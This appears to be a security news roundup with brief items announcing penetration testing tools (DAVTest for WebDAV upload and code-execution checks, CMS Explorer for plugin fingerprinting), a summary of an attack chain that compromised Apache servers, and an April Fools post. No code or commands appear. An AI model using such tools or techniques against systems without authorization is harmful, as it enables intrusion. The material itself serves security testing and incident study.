Chris Sullo sent us the following news entry "DAVTest attempts to aid a penetration tester when facing WebDAV enabled services by quickly testing file type upload capability and features, as well as checking for code execution. It supports MOVE and MKCOL, authentication, and uploading of included shell files." Download: http://security.sunera.com/2010/04/davtest-quickly-test-exploit-webdav.html
It appears someone used a combination of XSS on an Apache domain, a url shortener, and an issue tracking system to ultimately lead to rooting of 2 core Apache machines used to host bugzilla, and the main shell server. This is a great breakdown of a real world incident that people rarely...
Sullo writes in "CMS Explorer is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running. It can also search OSVDB.org for vulnerabilities in found components, as well as "bootstrap" a security proxy by downloading potential file names from the component's code repository...
In an April 1st shocker Robert "RSnake" Hansen (known in appsec circles as the prince of XSS) has just posted an entry on his site about his new gig at Google. "People tend to think of me as a Google hater, but the truth is the only thing I've hated about Google...
